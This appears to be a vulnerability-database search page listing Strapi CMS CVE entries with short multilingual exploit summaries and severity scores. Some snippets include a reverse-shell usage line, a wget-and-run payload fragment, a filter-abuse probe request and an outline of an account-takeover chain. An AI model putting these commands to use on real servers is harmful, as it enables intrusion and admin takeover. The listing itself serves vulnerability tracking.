Lucene search
+L

726 matches found

Kitploit
Kitploit
added 2026/09/20 2:14 p.m.9 views

CVE-2022-32114

Strapi v4.1.12 漏洞说明: Strapi v4.1.12 的“添加新资产”(Add New Assets)功能中存在一个不受限制的文件上传漏洞,攻击者可通过特制文件执行任意代码 攻击向量: 上传包含恶意内容的文件后,当用户打开该文件的链接时,其中包含的恶意代码将被执行。 Payload : https://github.com/bypazs/GrimTheRipper/blob/main/GrimTheRipperTeam.pdf 测试环境: 1. Strapi 版本 4.1.12 2. Google Chrome 版本 102.0.5005.61(正式版)(64 位)...

8.8CVSS8.3AI score0.01999EPSS
SaveExploits1References3
Kitploit
Kitploit
added 2026/09/20 10:49 a.m.8 views

CVE-2019-18818

CVE-2019-18818 Strapi = 3.0.0-beta 漏洞利用 PoC...

9.8CVSS8.3AI score0.97639EPSS
SaveExploits13
Kitploit
Kitploit
added 2026/09/20 5:17 a.m.12 views

CVE-2023-22621-POC

CVE-2023-22621-POC CVE-2023-22621:利用电子邮件模板实现 SSTI 到 RCE,影响 Strapi 版本 return strapi.config.get'plugin.email'; ; const send = async options = return strapi.plugin'email'.provider.sendoptions; ; / fill subject, text and html using lodash template @param object emailOptions - to, from and replyto...

10CVSS7.5AI score0.76825EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/20 4:16 a.m.9 views

CVE-2019-19609

CVE-2019-19609 Strapi 框架存在远程代码执行漏洞 好吧,我没找到针对 CVE-2019-19609 的利用代码,所以我写了一个。:/ 用法 root@kitploit: python3 exploit.py 视频 https://youtu.be/alhZJmuUd2s 更多信息 https://hack-fast.herokuapp.com/cve/CVE-2019-19609 https://github.com/strapi/strapi/pull/4636...

9CVSS7.5AI score0.54081EPSS
SaveExploits11References1
Nuclei
Nuclei
added 2026/09/20 2:05 a.m.83 views

Strapi Versions <=4.5.6 - Authentication Bypass

Strapi through 4.5.5 does not verify the access or ID tokens issued during the OAuth flow when the AWS Cognito login provider is used for authentication. A remote attacker could forge an ID token that is signed using the 'None' type algorithm to bypass authentication and impersonate any user that...

8.2CVSS7.4AI score0.04124EPSS
SaveExploits1References4
Kitploit
Kitploit
added 2026/09/20 2:02 a.m.13 views

Strapi-RCE

Strapi-RCE CVE-2019-18818 と CVE-2019-19609 を組み合わせたエクスプロイトスクリプトです。Strapi CMS において認証なしでリモートコード実行を実現します。 エクスプロイト このスクリプトは、Strapi CMS バージョン 3.0.0-beta.17.4 以前の脆弱性を悪用し、認証なしでのリモートコード実行を可能にします。 説明 このエクスプロイトは、まずパスワードリセットの脆弱性を利用して管理ユーザーの JSON Web Token JWT を取得します。次に、そのトークンを使って Strapi CMS...

9.8CVSS6.2AI score0.97639EPSS
SaveExploits21
Kitploit
Kitploit
added 2026/09/20 1:19 a.m.8 views

CVE-2023-22894

認証不要のStrapiエクスプロイト: CVE-2023-22894 このリポジトリには、CVE-2023-22894の概念実証(PoC)エクスプロイトが含まれています。これは、認証されていないユーザーがStrapiのフィルタリング機能をプライベートフィールドに対して悪用することで、機密情報を漏洩させ、Strapi管理者アカウントを乗っ取ることを可能にします。 概要...

10CVSS6.3AI score0.76825EPSS
SaveExploits4
Kitploit
Kitploit
added 2026/09/19 10:29 p.m.8 views

strapi_cms_3.0.0-beta.17.7

Strapi CMS CVE-2019-18818 および 19606 Strapi CMS バージョン 3.0.0-beta.17.7 以前における Blind Remote Code Execution でリバースシェルを取得 はじめに プログラムの実行 python3 を使用 root@kitploit: python3 strapiexp.py -t http://strapi.hack/ -e [email protected] -p newpassword -lhost 127.0.0.1 -lport 9001 ヘルプ ヘルププロンプト root@kitploit...

9.8CVSS8.4AI score0.97639EPSS
SaveExploits13
Kitploit
Kitploit
added 2026/09/19 9:45 p.m.5 views

CVE-2019-19609-EXPLOIT

CVE-2019-19609-EXPLOIT Exploit para CVE-2019-19609 en Strapi ejecución remota de código en strapi-3.0.0-beta.17.7 o anterior. Me enfrenté a un escenario con esta vulnerabilidad, pero sin un exploit público. Decidí crear el mío propio y compartirlo aquí. Instalación root@kitploit: git clone...

9CVSS7.6AI score0.54081EPSS
SaveExploits11
Kitploit
Kitploit
added 2026/09/19 8:58 p.m.7 views

CVE-2019-18818_CVE-2019-19609

CVE-2019-18818 和 CVE-2019-19609 利用脚本 本仓库包含一个 Python 脚本,用于利用两个漏洞:CVE-2019-18818 和 CVE-2019-19609。 CVE-2019-18818 该漏洞允许攻击者重置 Strapi CMS 中管理员用户的密码。 使用方法 1. 修改脚本中的 target 和 strapiport 变量,使其匹配目标 Strapi 实例。 2. 运行脚本以重置管理员密码。 CVE-2019-19609 该漏洞允许攻击者在运行 Strapi CMS 的服务器上执行任意命令。 使用方法 1. 修改脚本中的 localip 和...

9.8CVSS8.2AI score0.97639EPSS
SaveExploits21
Kitploit
Kitploit
added 2026/09/19 8:49 p.m.13 views

CVE-2019-19609

Strapi CMS 漏洞利用 该漏洞利用针对 Strapi CMS 框架 3.0.0-beta-17.4 版本中的两个漏洞,允许未经身份验证的远程代码执行(RCE)。 漏洞 CVE-2019-18818 弱密码恢复机制导致忘记密码 CVSS : 9.8 - 严重 更多详情: https://nvd.nist.gov/vuln/detail/CVE-2019-18818 CVE-2019-19609 未正确中和 OS 命令中的特殊元素('OS 命令注入') CVSS : 7.2 - 高危 更多详情:...

9.8CVSS8AI score0.97639EPSS
SaveExploits21
Kitploit
Kitploit
added 2026/09/19 8:45 p.m.8 views

Strapi-CVE-2019-1881

Strapi-CVE-2019-1881 作者:Kynda 1. pip install requests 2. python3 exploit.py :...

8.8CVSS6.8AI score0.01287EPSS
SaveExploits1
Kitploit
Kitploit
added 2026/09/19 5:07 p.m.8 views

CVE-2019-19609-POC-Python

该脚本将尝试将密码重置为"updatedpass"变量中声明的值;如果成功,它将从Strapi获取一个JWT令牌,并使用该令牌执行命令。 执行绑定命令无效,除非发送反向Shell载荷(使用bash或python等)。你可以生成一个.sh文件,该文件会为你下载nc并执行它,或者任何其他内容,甚至ELF文件。为此,请将payloadexp从&&改为。例如:&& $wget xxxx -O /tmp/oooo; bash /tmp/ooo URL 不再有效。...

9CVSS7.2AI score0.54081EPSS
SaveExploits11
Kitploit
Kitploit
added 2026/09/19 2:05 p.m.11 views

CVE-2019-19609

CVE-2019-19609 Strapi = 3.0.0-beta.17.8 認証されたリモートコード実行...

9CVSS7.4AI score0.54081EPSS
SaveExploits11
Nuclei
Nuclei
added 2026/09/19 2:05 a.m.149 views

Strapi Versions <=4.5.5 - SSTI to Remote Code Execution

Strapi through 4.5.5 allows authenticated Server-Side Template Injection SSTI that can be exploited to execute arbitrary code on the server. A remote attacker with access to the Strapi admin panel can inject a crafted payload that executes code on the server into an email template that bypasses t...

10CVSS7.7AI score0.76825EPSS
SaveExploits2References5
Kitploit
Kitploit
added 2026/09/16 6:20 a.m.9 views

CVE-2019-19609

CVE-2019-19609 Strapi 远程代码执行 使用方法 python3 exploit.py rhost jwt url lhost 利用POC https://bittherapy.net/post/strapi-framework-remote-code-execution/...

9CVSS7.3AI score0.54081EPSS
SaveExploits11
Kitploit
Kitploit
added 2026/09/15 4:04 p.m.9 views

CVE-2026-27886

CVE-2026-27886 Strapi PoC 仅限授权的安全测试。 Strapi因缺少查询清理而通过关系过滤泄露敏感数据。 包含: CVE-2026-27886.py - Python PoC CVE-2026-27886.yaml - Nuclei 检测模板 检测内容 检查器向公开的 Strapi 内容 API 集合端点发送两个请求: root@kitploit: GET /api/ GET /api/?whereid$lt=-1 如果基线响应包含记录,而错误的 where 谓词将结果集缩减为零,则该端点可能存在漏洞。 使用方法 Python 安全检测:...

9.2CVSS6AI score0.00612EPSS
SaveExploits5References1
Kitploit
Kitploit
added 2026/09/15 3:53 p.m.9 views

CVE-2026-27886-PoC-Account-Takeover

CVE-2026-27886 自动化利用 - 使用指南 脚本功能概述 通过 4 组 HTTP 请求自动完成完整的账户接管链: 1. 漏洞验证 - 确认目标存在漏洞 2. 邮箱枚举 - 通过布尔判定方式提取管理员邮箱(约 500 次请求) 3. 密码重置触发 - 启动 Strapi 的密码恢复流程 4. 令牌窃取 - 截获 40 字符的重置令牌(约 320 次请求) 5. 账户接管 - 使用窃取的令牌获取超级管理员 JWT 基本用法 仅验证模式(安全) 检查目标是否存在漏洞而不进行利用: root@kitploit: ./cve-2026-27886-exploit.py...

9.2CVSS6AI score0.00612EPSS
SaveExploits5
Kitploit
Kitploit
added 2026/09/14 8:04 a.m.12 views

CVE-2026-27886-check

CVE-2026-27886 脆弱性評価ツール 完全なアカウント乗っ取りチェーンを実行することなく、Strapi インスタンスが CVE-2026-27886 に対して脆弱かどうかを安全に検出します。Bishop Fox ブログの完全な記事を参照してください。 説明 CVE-2026-27886 は、Strapi バージョン 4.0.0 から 5.36.1 における、認証されていないパラメータサニタイゼーションのバイパスです。これにより、リモートの未認証攻撃者がパブリック Content API を通じて管理者の秘密情報を漏洩させることができます。フレームワークの @strapi/uti...

9.2CVSS5.7AI score0.00612EPSS
SaveExploits5References2
NVD
NVD
added 2026/09/13 11:17 a.m.8 views

CVE-2026-90561

Strapi versions 4.x through 4.26.2 and 5.x before 5.48.1 contain a stored cross-site scripting vulnerability in the content manager WYSIWYG preview component that fails to strip script tags from rich text. An Author-role user can store malicious script tags in rich text fields that execute in an...

9.3CVSS0.00236EPSS
SaveExploits0References5
Rows per page
Query Builder